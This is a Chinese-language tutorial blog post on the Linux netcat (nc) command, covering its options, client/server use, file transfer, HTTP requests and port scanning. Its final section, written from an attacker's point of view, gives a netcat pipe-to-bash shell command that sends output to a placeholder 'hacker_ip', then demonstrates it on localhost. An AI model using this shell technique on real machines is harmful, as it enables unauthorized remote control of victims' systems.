Linux命令-nc(端口监控文件传输反弹shell等)
Posted lady_killer9
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Linux命令-nc(端口监控文件传输反弹shell等)相关的知识,希望对你有一定的参考价值。
目录
简介
nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具。进行TCP、UDP的连接和监听,可以将标准错误分离。
参数
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]Command Summary:
-4 Use IPv4
-6 Use IPv6
-b Allow broadcast
-C Send CRLF as line-ending
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-I length TCP receive buffer length
-i secs Delay interval for lines sent, ports scanned
-j Use jumbo frame
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-O length TCP send buffer length
-P proxyuser Username for proxy authentication
-p port Specify local port for remote connects
-q secs quit after EOF on stdin and delay of secs
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s addr Local source address
-T toskeyword Set IP Type of Service
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-V rtable Specify alternate routing table
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-Z DCCP mode
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]
nc的作用
简单的TCP代理
基于shell脚本的HTTP客户端或服务器
网络守护进程/程序测试
文件传输
反弹shell(非本意)
参数详解
参数 | 解释 |
---|---|
-4 | 强制nc仅使用IPv4地址 |
-6 | 强制nc仅使用IPv6地址 |
-b | 允许广播 |
-C | 发送CRLF作为行结束符 |
-D | 在套接字上启动测试 |
-d | 不要试图从标准输入读入数据 |
-h | 打印nc帮助 |
-l length | 指定TCP接收缓冲区大小 |
-i interval | 指定发送和接收的文本行之间的延迟时间间隔。还会导致连接到多个端口之间的延迟时间。 |
-k | 强制nc在当前连接完成后继续侦听另一个连接。在没有-l选项的情况下使用此选项是错误的。 |
-l | 用于指定nc应侦听传入连接,而不是启动到远程主机的连接。将此选项与-p、-s或-z选项结合使用是错误的。此外,使用-w选项指定的任何超时都将被忽略。 |
-n | 不要在任何指定的地址、主机名或端口上执行任何DNS或服务查找。 |
-O length | 指定TCP发送缓冲区大小 |
-P proxy_username | 指定要呈现给需要身份验证的代理服务器的用户名。如果未指定用户名,则不会尝试身份验证。目前仅支持HTTP CONNECT代理的代理身份验证。 |
-p source_port | 根据权限限制和可用性,指定nc应使用的源端口。支持nn-mm范围模式和空格分隔。 |
-q seconds | 在stdin上执行EOF后,等待指定的秒数,然后退出。如果秒数为负,则永远等待。 |
-r | 指定应随机选择源端口和/或目标端口,而不是在某个范围内或按照系统分配的顺序顺序进行选择。 |
-S | 启用RFC 2385 TCP MD5签名选项。 |
-s source_ip | 指定用于发送数据包的接口的IP。对于UNIX域数据报套接字,指定要创建和使用的本地临时套接字文件,以便可以接收数据报。将此选项与-l选项结合使用是错误的。 |
-U | 指定使用UNIX域套接字。 |
-u | 使用UDP而不是TCP的默认选项。对于UNIX域套接字,请使用数据报套接字而不是流套接字。如果使用UNIX域套接字,则在/tmp中创建临时接收套接字,除非给出-s标志。 |
-V rtable | 设置要使用的路由表。默认值为0。 |
-v | 让nc提供更详细的输出。 |
-w timeout | 无法建立或在超时秒后处于空闲状态的连接。-w标志对-l选项没有影响,即nc将永久侦听连接,无论是否使用-w标志。默认值为无超时。 |
-X proxy_protocol | 请求nc在与代理服务器对话时应使用指定的协议。支持的协议有“4”(SOCKS v.4)、“5”(SOCKS v.5)和“connect”(HTTPS代理)。如果未指定协议,则使用SOCKS版本5。 |
-x proxy_address[:port] | 请求nc应使用代理地址和端口处的代理连接到目标。如果未指定端口,则使用代理协议的已知端口(1080用于SOCKS,3128用于HTTPS)。 |
-Z | DCCP模式。 |
-z | 指定nc应该只扫描侦听守护进程,而不向它们发送任何数据。将此选项与-l选项结合使用是错误的。 |
使用举例
客户/服务器模式
服务器端:监听端口
nc -l 6633
客户端:开启连接
nc 127.0.0.1 6633
这是同一台服务器,使用了tmux,开了frankyu和yubo,两个session。客户端和服务端就建立了Tcp连接,进行通信。
注意:当我们关闭客户端时,服务端也会关闭,可以添加-k选项,使服务端不关闭。
文件传输
对上面的客户/服务器模式进行扩展即可。使用linux的重定向。
服务器端:
nc -l 6633 > filename.out
客户端:
nc 127.0.0.1 6633 < filename.in
博主测试了,不截图了,留给读者自己动手测试。
基于TCP的上层协议
可以通过nc发送基于TCP的上层协议数据包,例如,应用层的HTTP协议
printf "GET / HTTP/1.0\\r\\n\\r\\n" | nc host.example.com 80
端口扫描
利用-z和-v参数,输出是否连接成功
nc -zv ip/host ports
可以看到22端口打开了。也可使用 22 80 6633,这种空格分隔的形式。
使用-u,就可以进行udp的扫描。当然,更详细的端口扫描还是使用Nmap。
反弹Shell
我们攻击其他的机器的时候,拿不到22端口的口令或私钥,甚至22端口没有打开。我们想要实时运行命令时,就可以使用nc反弹shell,有一种我们在操控对方电脑的感觉。利用前面的端口监听结合管道来实现。
在受害者机器上运行
nc -l port| /bin/bash/ | nc hacker_ip port
在攻击机上运行
nc -l port
nc victim_ip port
博主手里就一台服务器,这里攻击机和受害机都是使用的一台。
攻击机监听6655端口
nc -l 6655
操纵受害机6633端口接收命令,执行后结果输出到攻击机的6655端口
nc -l 6633 |/bin/bash/| nc 127.0.0.1 6655
攻击机开启6633端口发送命令
nc 127.0.0.1 6633
从攻击机源端口发送命令,就可以从目的端口接收命令执行的结果。
更多内容查看:网络安全-自学笔记
喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。
以上是关于Linux命令-nc(端口监控文件传输反弹shell等)的主要内容,如果未能解决你的问题,请参考以下文章